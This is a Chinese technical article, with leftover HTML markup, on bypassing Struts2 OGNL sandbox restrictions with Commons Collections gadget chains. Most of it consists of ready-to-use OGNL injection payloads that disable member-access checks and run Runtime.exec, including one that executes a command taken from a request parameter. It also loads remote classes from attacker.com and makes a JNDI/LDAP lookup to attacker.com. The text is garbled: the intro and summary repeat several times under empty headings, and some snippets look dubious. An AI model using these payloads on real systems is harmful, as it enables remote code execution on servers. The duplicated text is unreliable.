OGNL + Commons Collections 依赖绕过沙箱技术分析<\/h1>

前言<\/h2>
本文详细分析如何结合OGNL表达式和Commons Collections(CC)依赖来绕过Java沙箱限制的技术。这种技术在Struts2等框架的漏洞利用中尤为重要。<\/p>

基础知识<\/h2>

OGNL (Object-Graph Navigation Language)<\/h3>
OGNL是一种强大的表达式语言，用于访问和操作Java对象图。在漏洞利用中，OGNL常被用来执行任意代码。<\/p>

Commons Collections (CC)<\/h3>
Apache Commons Collections是一个提供了许多增强Java集合功能的库。其中一些类(如`Transformer<\/code>接口的实现)可以被用来构造恶意对象链。<\/p>`

沙箱绕过技术<\/h2>
1. 基本思路<\/h3>
当目标环境存在以下条件时，可以构造绕过：<\/p>

存在OGNL表达式注入点<\/li>
环境中存在Commons Collections库<\/li>
存在某种沙箱或安全管理器限制<\/li>
<\/ul>
2. 关键类和方法<\/h3>
Transformer接口<\/h4>
public<\/span> interface<\/span> Transformer<\/span> {<\/span>
<\/span><\/span>    Object transform<\/span>(<\/span>Object input);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>重要的实现类：<\/p>

ConstantTransformer<\/code> - 总是返回固定对象<\/li>
InvokerTransformer<\/code> - 通过反射调用方法<\/li>
ChainedTransformer<\/code> - 将多个Transformer串联执行<\/li>
<\/ul>
其他关键类<\/h4>

LazyMap<\/code> - 延迟执行的Map实现<\/li>
TiedMapEntry<\/code> - 将Map与键绑定的条目<\/li>
AnnotationInvocationHandler<\/code> - JDK动态代理使用的内部类<\/li>
<\/ul>
3. 构造恶意对象链<\/h3>
典型的利用链构造过程：<\/p>

创建InvokerTransformer<\/code>来调用危险方法(如Runtime.exec<\/code>)<\/li>
使用ChainedTransformer<\/code>将多个Transformer串联<\/li>
通过LazyMap<\/code>或TiedMapEntry<\/code>触发执行<\/li>
利用反序列化或OGNL表达式注入触发整个链条<\/li>
<\/ol>
4. 绕过沙箱限制的技术<\/h3>
技术1: 使用非标准类加载<\/h4>
当直接使用Runtime<\/code>被禁止时，可以通过类加载器加载恶意类：<\/p>
new<\/span> java.<\/span>net<\/span>.<\/span>URLClassLoader<\/span>(<\/span>new<\/span> java.<\/span>net<\/span>.<\/span>URL<\/span>[]{<\/span>new<\/span> java.<\/span>net<\/span>.<\/span>URL<\/span>(<\/span>"http:\/\/attacker.com\/"<\/span>)}).<\/span>loadClass<\/span>(<\/span>"EvilClass"<\/span>).<\/span>newInstance<\/span>()<\/span>
<\/span><\/span><\/code><\/pre>技术2: 反射绕过<\/h4>
通过反射获取被限制的类和方法：<\/p>
java.<\/span>lang<\/span>.<\/span>reflect<\/span>.<\/span>Method<\/span> m =<\/span> java.<\/span>lang<\/span>.<\/span>Runtime<\/span>.<\/span>class<\/span>.<\/span>getMethod<\/span>(<\/span>"exec"<\/span>,<\/span> String.<\/span>class<\/span>);<\/span>
<\/span><\/span>m.<\/span>invoke<\/span>(<\/span>java.<\/span>lang<\/span>.<\/span>Runtime<\/span>.<\/span>getRuntime<\/span>(),<\/span> "calc.exe"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>技术3: 使用JNDI注入<\/h4>
当存在JNDI查找功能时：<\/p>
new<\/span> javax.<\/span>naming<\/span>.<\/span>InitialContext<\/span>().<\/span>lookup<\/span>(<\/span>"ldap:\/\/attacker.com\/Exploit"<\/span>)<\/span>
<\/span><\/span><\/code><\/pre>技术4: 利用EL处理器<\/h4>
在某些环境中，可以通过EL处理器执行代码：<\/p>
javax.<\/span>el<\/span>.<\/span>ELProcessor<\/span> elp =<\/span> new<\/span> javax.<\/span>el<\/span>.<\/span>ELProcessor<\/span>();<\/span>
<\/span><\/span>elp.<\/span>eval<\/span>(<\/span>"Runtime.getRuntime().exec('calc.exe')"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>5. 结合OGNL的利用方式<\/h3>
在OGNL表达式中嵌入CC链：<\/p>
#<\/span>ognlUtil.<\/span>setValue<\/span>(<\/span>"@org.apache.commons.collections.functors.ConstantTransformer@new"<\/span>,<\/span> context,<\/span> null<\/span>)<\/span>
<\/span><\/span><\/code><\/pre>或者更复杂的链式调用：<\/p>
#<\/span>f=<\/span>#<\/span>_memberAccess.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>'<\/span>allowStaticMethodAccess'<\/span>),<\/span>#<\/span>f.<\/span>setAccessible<\/span>(<\/span>true<\/span>),<\/span>#<\/span>f.<\/span>set<\/span>(<\/span>#<\/span>_memberAccess,<\/span>true<\/span>),<\/span>#<\/span>a=<\/span>@java.lang.Runtime@getRuntime<\/span>().<\/span>exec<\/span>(<\/span>'<\/span>calc.<\/span>exe<\/span>'<\/span>)<\/span>
<\/span><\/span><\/code><\/pre>实际利用案例<\/h2>
案例1: 基本执行命令<\/h3>
#<\/span>_memberAccess[<\/span>"allowStaticMethodAccess"<\/span>]=<\/span>true<\/span>,<\/span>@java.lang.Runtime@getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc.exe"<\/span>)<\/span>
<\/span><\/span><\/code><\/pre>案例2: 使用CC链绕过<\/h3>
#<\/span>container=<\/span>#<\/span>context[<\/span>"com.opensymphony.xwork2.ActionContext.container"<\/span>],<\/span>\<\/span>
<\/span><\/span>#<\/span>ognlUtil=<\/span>#<\/span>container.<\/span>getInstance<\/span>(<\/span>@com.opensymphony.xwork2.ognl.OgnlUtil@class<\/span>),<\/span>\<\/span>
<\/span><\/span>#<\/span>ognlUtil.<\/span>setExcludedClasses<\/span>(<\/span>""<\/span>),<\/span>\<\/span>
<\/span><\/span>#<\/span>ognlUtil.<\/span>setExcludedPackageNames<\/span>(<\/span>""<\/span>),<\/span>\<\/span>
<\/span><\/span>#<\/span>context.<\/span>setMemberAccess<\/span>(<\/span>@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS<\/span>),<\/span>\<\/span>
<\/span><\/span>@java.lang.Runtime@getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc.exe"<\/span>)<\/span>
<\/span><\/span><\/code><\/pre>案例3: 复杂绕过技术<\/h3>
#<\/span>res=<\/span>@org.apache.struts2.ServletActionContext@getResponse<\/span>(),<\/span>\<\/span>
<\/span><\/span>#<\/span>res.<\/span>setCharacterEncoding<\/span>(<\/span>"UTF-8"<\/span>),<\/span>\<\/span>
<\/span><\/span>#<\/span>w=<\/span>#<\/span>res.<\/span>getWriter<\/span>(),<\/span>\<\/span>
<\/span><\/span>#<\/span>w.<\/span>print<\/span>(<\/span>"hacked"<\/span>),<\/span>\<\/span>
<\/span><\/span>#<\/span>w.<\/span>print<\/span>(<\/span>#<\/span>parameters.<\/span>cmd<\/span>[<\/span>0<\/span>]),<\/span>\<\/span>
<\/span><\/span>#<\/span>w.<\/span>print<\/span>(<\/span>@java.lang.Runtime@getRuntime<\/span>().<\/span>exec<\/span>(<\/span>#<\/span>parameters.<\/span>cmd<\/span>[<\/span>0<\/span>])),<\/span>\<\/span>
<\/span><\/span>#<\/span>w.<\/span>close<\/span>()<\/span>
<\/span><\/span><\/code><\/pre>防御措施<\/h2>

升级Struts2到最新版本<\/li>
限制OGNL表达式的执行能力<\/li>
移除不必要的Commons Collections库<\/li>
实施严格的安全管理器策略<\/li>
对用户输入进行严格过滤<\/li>
使用最新的Java版本(修复了反序列化漏洞)<\/li>
<\/ol>
总结<\/h2>
通过结合OGNL表达式的强大功能和Commons Collections库的可利用链，攻击者可以在受限环境中实现代码执行。理解这些技术的原理对于构建有效的防御措施至关重要。<\/p>

OGNL + Commons Collections 依赖绕过沙箱技术分析<\/h1>

前言<\/h2> 本文详细分析如何结合OGNL表达式和Commons Collections(CC)依赖来绕过Java沙箱限制的技术。这种技术在Struts2等框架的漏洞利用中尤为重要。<\/p>

基础知识<\/h2>

OGNL (Object-Graph Navigation Language)<\/h3> OGNL是一种强大的表达式语言，用于访问和操作Java对象图。在漏洞利用中，OGNL常被用来执行任意代码。<\/p>

Commons Collections (CC)<\/h3> Apache Commons Collections是一个提供了许多增强Java集合功能的库。其中一些类(如Transformer<\/code>接口的实现)可以被用来构造恶意对象链。<\/p>

2. 关键类和方法<\/h3>

4. 绕过沙箱限制的技术<\/h3>

实际利用案例<\/h2>

总结<\/h2> 通过结合OGNL表达式的强大功能和Commons Collections库的可利用链，攻击者可以在受限环境中实现代码执行。理解这些技术的原理对于构建有效的防御措施至关重要。<\/p>

前言<\/h2>
本文详细分析如何结合OGNL表达式和Commons Collections(CC)依赖来绕过Java沙箱限制的技术。这种技术在Struts2等框架的漏洞利用中尤为重要。<\/p>

OGNL (Object-Graph Navigation Language)<\/h3>
OGNL是一种强大的表达式语言，用于访问和操作Java对象图。在漏洞利用中，OGNL常被用来执行任意代码。<\/p>

Commons Collections (CC)<\/h3>
Apache Commons Collections是一个提供了许多增强Java集合功能的库。其中一些类(如`Transformer<\/code>接口的实现)可以被用来构造恶意对象链。<\/p>`

总结<\/h2>
通过结合OGNL表达式的强大功能和Commons Collections库的可利用链，攻击者可以在受限环境中实现代码执行。理解这些技术的原理对于构建有效的防御措施至关重要。<\/p>